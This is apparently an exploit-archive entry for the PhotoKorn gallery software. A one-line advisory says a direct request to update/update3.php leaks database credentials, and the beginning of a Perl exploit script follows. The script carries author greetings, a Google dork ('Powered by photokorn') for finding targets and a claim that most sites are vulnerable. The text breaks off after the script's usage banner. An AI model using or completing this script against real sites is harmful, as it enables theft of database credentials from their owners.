PhotoKorn allows remote malicious users to obtain database credentials via a direct request to update/update3.php, which includes the credentials in its output.
#!/usr/bin/perl
#Script : PhotoKron All Version
#All Version
#Author : Pr0metheuS
#Gr33tz to Gr33tz-Team
#Gr33tz-TeamORG
#Dork : "Powered by photokorn"
### INFO ##
# Works IF /update/ is on server60% site are vulnerable
## INFO ##
use LWP::UserAgent;
if (@ARGV!=2) {
print "-=-=-=-=-=-=-=-=-=-=-=--=\n";
print "PhotoKorn Remote Database ...